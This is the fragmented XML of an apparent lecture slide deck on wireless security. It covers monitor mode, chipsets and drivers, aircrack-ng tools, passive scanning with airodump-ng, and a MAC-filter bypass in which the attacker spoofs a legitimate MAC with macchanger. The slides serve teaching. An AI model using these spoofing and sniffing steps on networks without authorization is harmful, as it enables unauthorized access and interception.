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8" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="262" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="265" r:id="rId9"/>
    <p:sldId id="266" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="259" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="269" r:id="rId15"/>
    <p:sldId id="271" r:id="rId16"/>
    <p:sldId id="270" r:id="rId17"/>
    <p:sldId id="280" r:id="rId18"/>
    <p:sldId id="272" r:id="rId19"/>
    <p:sldId id="273" r:id="rId20"/>
    <p:sldId id="282" r:id="rId21"/>
    <p:sldId id="275" r:id="rId22"/>
    <p:sldId id="276" r:id="rId23"/>
    <p:sldId id="277" r:id="rId24"/>
    <p:sldId id="278" r:id="rId25"/>
    <p:sldId id="279" r:id="rId26"/>
    <p:sldId id="281" r:id="rId27"/>
    <p:sldId id="289" r:id="rId28"/>
    <p:sldId id="290" r:id="rId29"/>
    <p:sldId id="291" r:id="rId30"/>
    <p:sldId id="292" r:id="rId31"/>
    <p:sldId id="293" r:id="rId32"/>
    <p:sldId id="295" r:id="rId33"/>
    <p:sldId id="296" r:id="rId34"/>
    <p:sldId id="283" r:id="rId35"/>
    <p:sldId id="284" r:id="rId36"/>
    <p:sldId id="294" r:id="rId3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158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1480C8-360E-F24B-96CB-D1A38960EBF9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/30/15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3DF8D-F42A-9F4B-AA4E-79A69029BE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994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702756" indent="-270291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marL="1081164" indent="-216233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marL="1513629" indent="-216233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marL="1946095" indent="-216233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2378560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2811026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3243491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3675957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DAA223A-41F1-BB4B-B5BE-52E36D7E8EAD}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" b="0">
              <a:latin typeface="Times New Roman" charset="0"/>
            </a:endParaRPr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32" tIns="45716" rIns="91432" bIns="45716"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702756" indent="-270291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marL="1081164" indent="-216233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marL="1513629" indent="-216233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marL="1946095" indent="-216233" defTabSz="905475" eaLnBrk="0" hangingPunct="0"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2378560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2811026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3243491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3675957" indent="-216233" algn="r" defTabSz="905475" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="19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2A41836-87AE-4941-8B04-EDDAB207590B}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" b="0">
              <a:latin typeface="Times New Roman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32" tIns="45716" rIns="91432" bIns="45716"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman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970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60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7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758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157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4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310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302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78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449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2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5F95D8-7620-214A-BEB5-99C6D716EED2}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/30/15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C9FCD1-B274-F048-8303-A5FA5845A6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455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ireshark.org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w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Wireless Security in Practice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5295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Demo: ICMP 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Analyze ICMP ping packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>disable ping response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –I OUTPUT –p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –j DROP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572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Node only receives packets destined to it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666"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4112638" y="2718238"/>
            <a:ext cx="1737379" cy="28115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24299" y="2602245"/>
            <a:ext cx="2725969" cy="311340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50268" y="2454915"/>
            <a:ext cx="1183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IP:10.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MAC: 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2469" y="5936438"/>
            <a:ext cx="2493642" cy="3794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SRC=X, DST=OTHER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Elbow Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="3"/>
            <a:endCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3206111" y="5529771"/>
            <a:ext cx="1775217" cy="596392"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4981328" y="4910186"/>
            <a:ext cx="0" cy="619585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arrow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4" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4981328" y="4938748"/>
            <a:ext cx="997218" cy="13300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none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611" y="5365261"/>
            <a:ext cx="737119" cy="1142354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Elbow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="3"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7573857" y="4952048"/>
            <a:ext cx="939314" cy="413213"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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496417" y="4677846"/>
            <a:ext cx="419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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Elbow Connector 23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6114103" y="4052999"/>
            <a:ext cx="238612" cy="1116562"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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Diamond 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5978546" y="4653136"/>
            <a:ext cx="1595311" cy="59782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DST==ME?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6759320" y="4401461"/>
            <a:ext cx="442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YES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11496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Monitor mode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Receive packets destined to other nodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Managed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46666"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4112638" y="2718238"/>
            <a:ext cx="1737379" cy="281153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624299" y="2602245"/>
            <a:ext cx="2725969" cy="3113401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350268" y="2454915"/>
            <a:ext cx="1183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IP:10.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MAC: ME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12469" y="5936438"/>
            <a:ext cx="2493642" cy="3794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SRC=X, DST=OTHER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Elbow Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="3"/>
            <a:endCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3206111" y="5529771"/>
            <a:ext cx="1775217" cy="596392"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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endCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4981328" y="4910186"/>
            <a:ext cx="0" cy="619585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arrow"/>
            <a:tailEnd type="non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4" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4981328" y="4938748"/>
            <a:ext cx="997218" cy="13300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:headEnd type="none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4611" y="5365261"/>
            <a:ext cx="737119" cy="1142354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Elbow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5675128" y="4491973"/>
            <a:ext cx="1898729" cy="460075"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -12040"/>
            </a:avLst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7759713" y="4677846"/>
            <a:ext cx="419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NO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Elbow Connector 23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6114103" y="4052999"/>
            <a:ext cx="238612" cy="1116562"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/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4" name="Diamond 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5978546" y="4653136"/>
            <a:ext cx="1595311" cy="59782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dirty="0" smtClean="0"/>
              <a:t>DST==ME?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6759320" y="4432441"/>
            <a:ext cx="4423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YES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6917595" y="3869032"/>
            <a:ext cx="1927719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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Minotor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Promiscuous mode)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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264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use monitor mode?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 wireless card that allows monitor mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use wireless driver that allows monitor mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enable monitor mode by wireless card utility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TP-LINK’s TL-WN722N card (Atheros chipset)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux with mac802.11 stack (kernel &gt;= 3.3.8)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>i.e., no need to patch kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some attacks need to patch kernel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4674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Chipset &amp; Drivers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4434"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Chipset (hardware) and driver(software) is in pair</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>You need</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>monitor mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>packet injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Library for packet injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>LORCON(2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Airpwn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>OSDEP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Aircrack-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> suite, MDK3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Chipsets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Ralink’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> RT2X00, driver rt2x00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Realte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>`’s RTL8187, driver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>alfa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, used in Alfa USB card, no support of 11a/n/ac</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Atheros’s AR5XXX, AR9XXX, many drivers. driver ath9k_htc for AR9271</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Intel (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>iwlwifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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185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53561" y="4363775"/>
            <a:ext cx="4274816" cy="1367354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000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Linux Kernel &gt; 3.3.8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Stacks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453561" y="4363775"/>
            <a:ext cx="2137408" cy="6393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ieee80211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590969" y="4363774"/>
            <a:ext cx="2137408" cy="63934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mac80211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45461" y="4390470"/>
            <a:ext cx="10992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wireless</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>extension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453561" y="3159820"/>
            <a:ext cx="4274816" cy="80121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wireless card driver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743869" y="3159803"/>
            <a:ext cx="21300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ath9k_htc, rt2x00, …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453561" y="2245919"/>
            <a:ext cx="4274816" cy="91388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Packet injection library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741389" y="2227903"/>
            <a:ext cx="15766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osdep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, lorcon2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1453561" y="1440465"/>
            <a:ext cx="4274816" cy="78743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Hacking tools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28377" y="1440465"/>
            <a:ext cx="29987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airocrack-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, mdk3, kismet, …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1453561" y="3958874"/>
            <a:ext cx="2137408" cy="40490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wlan0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0949" y="3958874"/>
            <a:ext cx="10302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Interface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3590969" y="3958873"/>
            <a:ext cx="2137408" cy="40490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mon0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905998" y="3942406"/>
            <a:ext cx="3082895" cy="12003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wlan0/ieee80211: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>no monitor mode support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mon0/mac802.11: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>monitor mode support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8629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wireless in Linux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ifconfig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>manage network interfaces in general</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>up, down, change IP address, MAC address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iwconfig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>manage wireless network interface (wlan0, mon0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>essid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, mode, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>channnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, AP, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lsusb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>list </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>usb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lsmod</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>list modules (drivers)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36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MAC filtering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Just change hacker’s MAC to legitimate MAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> wlan0 down</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>macchanger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –m &lt;MAC&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>wlan0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>(or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>ifconfig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hw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> ether &lt;MAC&gt; wlan0)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> wlan0 up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301139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Getting ready for sniffing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Get monitor mode on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Plug in wireless card</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check wlan0 is up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iwconfig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Create monitor mode interface (mon0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>airmon-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> start wlan0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>airmon-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>airmon-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> check kill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7133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Run a passive scanning to know APs and Stations nearby</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> mon0 &lt;filter options&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Filter options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-d &lt;BSSID&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-N &lt;ESSID&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-R &lt;ESSID regular expression&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-t &lt;Encryption (OPN, WEP, WPA, WPA2)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-x &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-w &lt;capture file&gt;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025576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need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Hardware</a:t>
            </a:r>
          </a:p>
